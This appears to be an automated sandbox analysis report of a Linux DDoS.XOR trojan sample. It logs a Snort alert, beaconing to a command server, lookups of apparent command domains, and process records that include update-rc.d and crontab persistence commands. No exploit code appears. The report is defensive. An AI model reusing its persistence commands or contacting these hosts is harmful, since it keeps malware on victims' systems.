__mpn_extract_long_double	.symtab	0x8098900	279	FUNC	<unknown>	DEFAULT	3
__mpn_impn_mul_n	.symtab	0x80975c0	1989	FUNC	<unknown>	DEFAULT	3
__mpn_impn_mul_n_basecase	.symtab	0x80974c0	247	FUNC	<unknown>	DEFAULT	3
__mpn_impn_sqr_n	.symtab	0x8097d90	1829	FUNC	<unknown>	DEFAULT	3
__mpn_impn_sqr_n_basecase	.symtab	0x80973c0	250	FUNC	<unknown>	DEFAULT	3
__mpn_lshift	.symtab	0x8096f70	87	FUNC	<unknown>	DEFAULT	3
__mpn_mul	.symtab	0x8097030	843	FUNC	<unknown>	DEFAULT	3
__mpn_mul_1	.symtab	0x8097380	57	FUNC	<unknown>	DEFAULT	3
__mpn_mul_n	.symtab	0x80984c0	620	FUNC	<unknown>	DEFAULT	3
__mpn_rshift	.symtab	0x8096fd0	87	FUNC	<unknown>	DEFAULT	3
__mpn_sub_n	.symtab	0x8098730	144	FUNC	<unknown>	DEFAULT	3
__mpn_submul_1	.symtab	0x80987c0	60	FUNC	<unknown>	DEFAULT	3
__mprotect	.symtab	0x8069dc0	33	FUNC	<unknown>	DEFAULT	3
__mremap	.symtab	0x806ad20	45	FUNC	<unknown>	DEFAULT	3
__munmap	.symtab	0x8069da0	31	FUNC	<unknown>	DEFAULT	3
__nanosleep	.symtab	0x8067700	87	FUNC	<unknown>	DEFAULT	3
__nanosleep_nocancel	.symtab	0x806770a	31	FUNC	<unknown>	DEFAULT	3
__new_exitfn	.symtab	0x8055f50	274	FUNC	<unknown>	DEFAULT	3
__new_exitfn_called	.symtab	0x80d61a0	8	OBJECT	<unknown>	DEFAULT	22
__new_fclose	.symtab	0x8057d40	439	FUNC	<unknown>	DEFAULT	3
__new_fopen	.symtab	0x80581f0	34	FUNC	<unknown>	DEFAULT	3
__new_getrlimit	.symtab	0x8068f80	54	FUNC	<unknown>	DEFAULT	3
__new_sem_init	.symtab	0x8053270	84	FUNC	<unknown>	DEFAULT	3
__new_sem_post	.symtab	0x8053370	78	FUNC	<unknown>	DEFAULT	3
__new_sem_wait	.symtab	0x80532d0	141	FUNC	<unknown>	DEFAULT	3
__nptl_create_event	.symtab	0x8054650	5	FUNC	<unknown>	DEFAULT	3
__nptl_deallocate_tsd	.symtab	0x80508d0	278	FUNC	<unknown>	DEFAULT	3
__nptl_death_event	.symtab	0x8054660	5	FUNC	<unknown>	DEFAULT	3
__nptl_initial_report_events	.symtab	0x80d202c	1	OBJECT	<unknown>	DEFAULT	22
__nptl_last_event	.symtab	0x80d2020	4	OBJECT	<unknown>	DEFAULT	22
__nptl_nthreads	.symtab	0x80cf450	4	OBJECT	<unknown>	DEFAULT	21
__nptl_setxid	.symtab	0x8050db0	941	FUNC	<unknown>	DEFAULT	3
__nptl_threads_events	.symtab	0x80d2018	8	OBJECT	<unknown>	DEFAULT	22
__offtime	.symtab	0x809ef60	746	FUNC	<unknown>	DEFAULT	3
__open	.symtab	0x8053cd0	91	FUNC	<unknown>	DEFAULT	3
__open_nocancel	.symtab	0x8053cda	33	FUNC	<unknown>	DEFAULT	3
__opendir	.symtab	0x80671f0	220	FUNC	<unknown>	DEFAULT	3
__overflow	.symtab	0x805d760	41	FUNC	<unknown>	DEFAULT	3
__parse_one_specmb	.symtab	0x80833d0	1320	FUNC	<unknown>	DEFAULT	3
__pause_nocancel	.symtab	0x8053d3a	19	FUNC	<unknown>	DEFAULT	3
__posix_memalign	.symtab	0x8064020	111	FUNC	<unknown>	DEFAULT	3
__preinit_array_end	.symtab	0x80cf080	0	NOTYPE	<unknown>	HIDDEN	14
__preinit_array_start	.symtab	0x80cf080	0	NOTYPE	<unknown>	HIDDEN	14
__printf_arginfo_table	.symtab	0x80d6340	4	OBJECT	<unknown>	DEFAULT	23
__printf_fp	.symtab	0x807f570	9363	FUNC	<unknown>	DEFAULT	3
__printf_fphex	.symtab	0x8081aa0	6104	FUNC	<unknown>	DEFAULT	3

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.2354.36.15.963673860032020381 09/21/22-23:39:24.140641	TCP	2020381	ET TROJAN DDoS.XOR Checkin	36738	6003	192.168.2.23	54.36.15.96

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 21, 2022 23:39:22.346151114 CEST	42836	443	192.168.2.23	91.189.91.43
Sep 21, 2022 23:39:23.114056110 CEST	42516	80	192.168.2.23	109.202.202.202
Sep 21, 2022 23:39:23.393732071 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:39:23.425556898 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:39:23.425717115 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:39:24.071803093 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:39:24.125602007 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:39:24.140640974 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:39:24.168421030 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:39:24.168839931 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:39:34.204791069 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:39:34.204988956 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:39:37.705353022 CEST	43928	443	192.168.2.23	91.189.91.42
Sep 21, 2022 23:39:39.112063885 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:39:39.112216949 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:39:47.944915056 CEST	42836	443	192.168.2.23	91.189.91.43
Sep 21, 2022 23:39:49.143989086 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:39:49.144392967 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:39:54.088376045 CEST	42516	80	192.168.2.23	109.202.202.202
Sep 21, 2022 23:39:59.176275969 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:39:59.176433086 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:40:09.224299908 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:40:09.224564075 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:40:14.147336960 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:40:14.147775888 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:40:18.663063049 CEST	43928	443	192.168.2.23	91.189.91.42
Sep 21, 2022 23:40:24.179291964 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:40:24.182831049 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:40:34.211308002 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:40:34.211508989 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:40:39.142204046 CEST	42836	443	192.168.2.23	91.189.91.43
Sep 21, 2022 23:40:44.243438005 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:40:44.244520903 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:40:49.181953907 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:40:49.183410883 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:40:59.213819981 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:40:59.213871956 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:41:09.246409893 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:41:09.246722937 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:41:19.278652906 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:41:19.279028893 CEST	36738	6003	192.168.2.23	54.36.15.96
Sep 21, 2022 23:41:24.217036963 CEST	6003	36738	54.36.15.96	192.168.2.23
Sep 21, 2022 23:41:24.217477083 CEST	36738	6003	192.168.2.23	54.36.15.96

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 21, 2022 23:39:23.212416887 CEST	50309	53	192.168.2.23	8.8.8.8
Sep 21, 2022 23:39:23.229100943 CEST	37054	53	192.168.2.23	8.8.8.8
Sep 21, 2022 23:39:23.237544060 CEST	53	50309	8.8.8.8	192.168.2.23
Sep 21, 2022 23:39:23.237709045 CEST	55602	53	192.168.2.23	8.8.4.4
Sep 21, 2022 23:39:23.269560099 CEST	53	55602	8.8.4.4	192.168.2.23
Sep 21, 2022 23:39:23.393559933 CEST	53	37054	8.8.8.8	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 21, 2022 23:39:23.212416887 CEST	192.168.2.23	8.8.8.8	0x50b2	Standard query (0)	gatat456.com	A (IP address)	IN (0x0001)	false
Sep 21, 2022 23:39:23.229100943 CEST	192.168.2.23	8.8.8.8	0x843d	Standard query (0)	aaa.xxxatat456.com	A (IP address)	IN (0x0001)	false
Sep 21, 2022 23:39:23.237709045 CEST	192.168.2.23	8.8.4.4	0x9937	Standard query (0)	gatat456.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 21, 2022 23:39:23.237544060 CEST	8.8.8.8	192.168.2.23	0x50b2	Name error (3)	gatat456.com	none	none	A (IP address)	IN (0x0001)	false
Sep 21, 2022 23:39:23.269560099 CEST	8.8.4.4	192.168.2.23	0x9937	Name error (3)	gatat456.com	none	none	A (IP address)	IN (0x0001)	false
Sep 21, 2022 23:39:23.393559933 CEST	8.8.8.8	192.168.2.23	0x843d	No error (0)	aaa.xxxatat456.com		54.36.15.96	A (IP address)	IN (0x0001)	false
Sep 21, 2022 23:39:23.393559933 CEST	8.8.8.8	192.168.2.23	0x843d	No error (0)	aaa.xxxatat456.com		79.137.1.132	A (IP address)	IN (0x0001)	false
Sep 21, 2022 23:39:23.393559933 CEST	8.8.8.8	192.168.2.23	0x843d	No error (0)	aaa.xxxatat456.com		46.105.84.190	A (IP address)	IN (0x0001)	false
Sep 21, 2022 23:39:23.393559933 CEST	8.8.8.8	192.168.2.23	0x843d	No error (0)	aaa.xxxatat456.com		54.36.15.98	A (IP address)	IN (0x0001)	false
Sep 21, 2022 23:39:23.393559933 CEST	8.8.8.8	192.168.2.23	0x843d	No error (0)	aaa.xxxatat456.com		46.105.84.188	A (IP address)	IN (0x0001)	false
Sep 21, 2022 23:39:23.393559933 CEST	8.8.8.8	192.168.2.23	0x843d	No error (0)	aaa.xxxatat456.com		79.137.1.134	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: fuck.elf PID: 6235, Parent PID: 6127

General

Start time:	23:39:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	/tmp/fuck.elf
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:21
Start date:	21/09/2022
Path:	/sbin/update-rc.d
Arguments:	update-rc.d fuck.elf defaults
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Start time:	23:39:22
Start date:	21/09/2022
Path:	/sbin/update-rc.d
Arguments:	n/a
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Start time:	23:39:22
Start date:	21/09/2022
Path:	/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time:	23:39:21
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:21
Start date:	21/09/2022
Path:	/bin/sh
Arguments:	sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time:	23:39:22
Start date:	21/09/2022
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time:	23:39:22
Start date:	21/09/2022
Path:	/bin/sed
Arguments:	sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Start time:	23:39:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:27
Start date:	21/09/2022
Path:	/usr/bin/zfyjfaoiow
Arguments:	/usr/bin/zfyjfaoiow id 6236
File size:	625718 bytes
MD5 hash:	e87ceadb8a4e38e1d33a543f1ef6f174

Start time:	23:39:27
Start date:	21/09/2022
Path:	/usr/bin/zfyjfaoiow
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	e87ceadb8a4e38e1d33a543f1ef6f174

Start time:	23:39:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:27
Start date:	21/09/2022
Path:	/usr/bin/zfyjfaoiow
Arguments:	/usr/bin/zfyjfaoiow id 6236
File size:	625718 bytes
MD5 hash:	e87ceadb8a4e38e1d33a543f1ef6f174

Start time:	23:39:27
Start date:	21/09/2022
Path:	/usr/bin/zfyjfaoiow
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	e87ceadb8a4e38e1d33a543f1ef6f174

Start time:	23:39:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:27
Start date:	21/09/2022
Path:	/usr/bin/zfyjfaoiow
Arguments:	/usr/bin/zfyjfaoiow top 6236
File size:	625718 bytes
MD5 hash:	e87ceadb8a4e38e1d33a543f1ef6f174

Start time:	23:39:28
Start date:	21/09/2022
Path:	/usr/bin/zfyjfaoiow
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	e87ceadb8a4e38e1d33a543f1ef6f174

Start time:	23:39:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:27
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:27
Start date:	21/09/2022
Path:	/usr/bin/zfyjfaoiow
Arguments:	/usr/bin/zfyjfaoiow pwd 6236
File size:	625718 bytes
MD5 hash:	e87ceadb8a4e38e1d33a543f1ef6f174

Start time:	23:39:28
Start date:	21/09/2022
Path:	/usr/bin/zfyjfaoiow
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	e87ceadb8a4e38e1d33a543f1ef6f174

Start time:	23:39:28
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:28
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:28
Start date:	21/09/2022
Path:	/usr/bin/zfyjfaoiow
Arguments:	/usr/bin/zfyjfaoiow "ifconfig eth0" 6236
File size:	625718 bytes
MD5 hash:	e87ceadb8a4e38e1d33a543f1ef6f174

Start time:	23:39:28
Start date:	21/09/2022
Path:	/usr/bin/zfyjfaoiow
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	e87ceadb8a4e38e1d33a543f1ef6f174

Start time:	23:39:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:33
Start date:	21/09/2022
Path:	/usr/bin/hwcijqdbza
Arguments:	/usr/bin/hwcijqdbza "grep \"A\"" 6236
File size:	625718 bytes
MD5 hash:	7a51136a3f9c74ff582dade0a6ff9c1e

Start time:	23:39:33
Start date:	21/09/2022
Path:	/usr/bin/hwcijqdbza
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	7a51136a3f9c74ff582dade0a6ff9c1e

Start time:	23:39:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:33
Start date:	21/09/2022
Path:	/usr/bin/hwcijqdbza
Arguments:	/usr/bin/hwcijqdbza "echo \"find\"" 6236
File size:	625718 bytes
MD5 hash:	7a51136a3f9c74ff582dade0a6ff9c1e

Start time:	23:39:33
Start date:	21/09/2022
Path:	/usr/bin/hwcijqdbza
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	7a51136a3f9c74ff582dade0a6ff9c1e

Start time:	23:39:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:33
Start date:	21/09/2022
Path:	/usr/bin/hwcijqdbza
Arguments:	/usr/bin/hwcijqdbza id 6236
File size:	625718 bytes
MD5 hash:	7a51136a3f9c74ff582dade0a6ff9c1e

Start time:	23:39:33
Start date:	21/09/2022
Path:	/usr/bin/hwcijqdbza
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	7a51136a3f9c74ff582dade0a6ff9c1e

Start time:	23:39:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:33
Start date:	21/09/2022
Path:	/usr/bin/hwcijqdbza
Arguments:	/usr/bin/hwcijqdbza "netstat -antop" 6236
File size:	625718 bytes
MD5 hash:	7a51136a3f9c74ff582dade0a6ff9c1e

Start time:	23:39:34
Start date:	21/09/2022
Path:	/usr/bin/hwcijqdbza
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	7a51136a3f9c74ff582dade0a6ff9c1e

Start time:	23:39:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:33
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:33
Start date:	21/09/2022
Path:	/usr/bin/hwcijqdbza
Arguments:	/usr/bin/hwcijqdbza "sleep 1" 6236
File size:	625718 bytes
MD5 hash:	7a51136a3f9c74ff582dade0a6ff9c1e

Start time:	23:39:34
Start date:	21/09/2022
Path:	/usr/bin/hwcijqdbza
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	7a51136a3f9c74ff582dade0a6ff9c1e

Start time:	23:39:39
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:39
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:39
Start date:	21/09/2022
Path:	/usr/bin/ggsxjmacxa
Arguments:	/usr/bin/ggsxjmacxa "ifconfig eth0" 6236
File size:	625718 bytes
MD5 hash:	7e521ab8f870858fcfe5d5814bddc362

Start time:	23:39:39
Start date:	21/09/2022
Path:	/usr/bin/ggsxjmacxa
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	7e521ab8f870858fcfe5d5814bddc362

Start time:	23:39:39
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:39
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:39
Start date:	21/09/2022
Path:	/usr/bin/ggsxjmacxa
Arguments:	/usr/bin/ggsxjmacxa "ls -la" 6236
File size:	625718 bytes
MD5 hash:	7e521ab8f870858fcfe5d5814bddc362

Start time:	23:39:39
Start date:	21/09/2022
Path:	/usr/bin/ggsxjmacxa
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	7e521ab8f870858fcfe5d5814bddc362

Start time:	23:39:39
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:39
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:39
Start date:	21/09/2022
Path:	/usr/bin/ggsxjmacxa
Arguments:	/usr/bin/ggsxjmacxa "ifconfig eth0" 6236
File size:	625718 bytes
MD5 hash:	7e521ab8f870858fcfe5d5814bddc362

Start time:	23:39:39
Start date:	21/09/2022
Path:	/usr/bin/ggsxjmacxa
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	7e521ab8f870858fcfe5d5814bddc362

Start time:	23:39:39
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:39
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:39
Start date:	21/09/2022
Path:	/usr/bin/ggsxjmacxa
Arguments:	/usr/bin/ggsxjmacxa "sleep 1" 6236
File size:	625718 bytes
MD5 hash:	7e521ab8f870858fcfe5d5814bddc362

Start time:	23:39:40
Start date:	21/09/2022
Path:	/usr/bin/ggsxjmacxa
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	7e521ab8f870858fcfe5d5814bddc362

Start time:	23:39:40
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:40
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:40
Start date:	21/09/2022
Path:	/usr/bin/ggsxjmacxa
Arguments:	/usr/bin/ggsxjmacxa "cd /etc" 6236
File size:	625718 bytes
MD5 hash:	7e521ab8f870858fcfe5d5814bddc362

Start time:	23:39:40
Start date:	21/09/2022
Path:	/usr/bin/ggsxjmacxa
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	7e521ab8f870858fcfe5d5814bddc362

Start time:	23:39:45
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:45
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:45
Start date:	21/09/2022
Path:	/usr/bin/sanzuhhixf
Arguments:	/usr/bin/sanzuhhixf sh 6236
File size:	625718 bytes
MD5 hash:	20020d772de3b4a641da0272b36f3272

Start time:	23:39:45
Start date:	21/09/2022
Path:	/usr/bin/sanzuhhixf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	20020d772de3b4a641da0272b36f3272

Start time:	23:39:45
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:45
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:45
Start date:	21/09/2022
Path:	/usr/bin/sanzuhhixf
Arguments:	/usr/bin/sanzuhhixf "netstat -an" 6236
File size:	625718 bytes
MD5 hash:	20020d772de3b4a641da0272b36f3272

Start time:	23:39:45
Start date:	21/09/2022
Path:	/usr/bin/sanzuhhixf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	20020d772de3b4a641da0272b36f3272

Start time:	23:39:45
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:45
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:45
Start date:	21/09/2022
Path:	/usr/bin/sanzuhhixf
Arguments:	/usr/bin/sanzuhhixf "echo \"find\"" 6236
File size:	625718 bytes
MD5 hash:	20020d772de3b4a641da0272b36f3272

Start time:	23:39:46
Start date:	21/09/2022
Path:	/usr/bin/sanzuhhixf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	20020d772de3b4a641da0272b36f3272

Start time:	23:39:45
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:45
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:45
Start date:	21/09/2022
Path:	/usr/bin/sanzuhhixf
Arguments:	/usr/bin/sanzuhhixf top 6236
File size:	625718 bytes
MD5 hash:	20020d772de3b4a641da0272b36f3272

Start time:	23:39:46
Start date:	21/09/2022
Path:	/usr/bin/sanzuhhixf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	20020d772de3b4a641da0272b36f3272

Start time:	23:39:46
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:46
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:46
Start date:	21/09/2022
Path:	/usr/bin/sanzuhhixf
Arguments:	/usr/bin/sanzuhhixf ls 6236
File size:	625718 bytes
MD5 hash:	20020d772de3b4a641da0272b36f3272

Start time:	23:39:46
Start date:	21/09/2022
Path:	/usr/bin/sanzuhhixf
Arguments:	n/a
File size:	625718 bytes
MD5 hash:	20020d772de3b4a641da0272b36f3272

Start time:	23:39:51
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:51
Start date:	21/09/2022
Path:	/tmp/fuck.elf
Arguments:	n/a
File size:	625707 bytes
MD5 hash:	ee5edcc4d824db63a8c8264a8631f067

Start time:	23:39:51
Start date:	21/09/2022
Path:	/usr/bin/zkleyiegjf
Arguments:	/usr/bin/zkleyiegjf "echo \"find\"" 6236
File size:	625718 bytes
MD5 hash:	f6b5753a34aff292e6ecb9853b898493

Start time:	23:39:51
Start date:	21/09/2022
